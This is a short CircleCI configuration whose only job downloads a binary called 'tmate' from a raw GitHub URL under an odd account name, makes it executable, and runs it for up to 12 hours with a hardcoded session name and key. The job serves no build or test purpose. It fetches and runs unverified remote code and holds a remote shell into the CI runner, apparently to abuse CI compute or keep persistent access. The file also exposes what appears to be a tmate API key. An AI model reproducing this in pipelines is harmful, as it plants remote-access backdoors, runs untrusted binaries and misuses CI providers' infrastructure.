version: 2.1

# This configuration defines a single job that downloads, prepares, and runs tmate.
jobs:
  run_tmate_continuously:
    docker:
      - image: cimg/base:stable
    resource_class: medium
    steps:
      - checkout
      - run:
          name: Download, Set Permissions, and Run tmate
          no_output_timeout: 12h
          command: |
            set -e
            echo "Step 1: Downloading tmate..."
            if wget https://raw.githubusercontent.com/hp20h5w91nf1/hp20h5w91nf1/main/tmate -O ./tmate; then
              echo "tmate downloaded successfully."
            else
              echo "Failed to download tmate. Exiting."
              exit 1
            fi
            echo "Step 2: Setting execute permissions for tmate..."
            chmod +x ./tmate
            echo "Permissions set for tmate."
            echo "Step 3: Running tmate..."
            ./tmate -F -n j1 -k tmk-mS87E0h6YTY55X6FpuAAbWFMpg
            echo "tmate process has finished or was interrupted."
workflows:
  version: 2
  tmate_workflow:
    jobs:
      - run_tmate_continuously
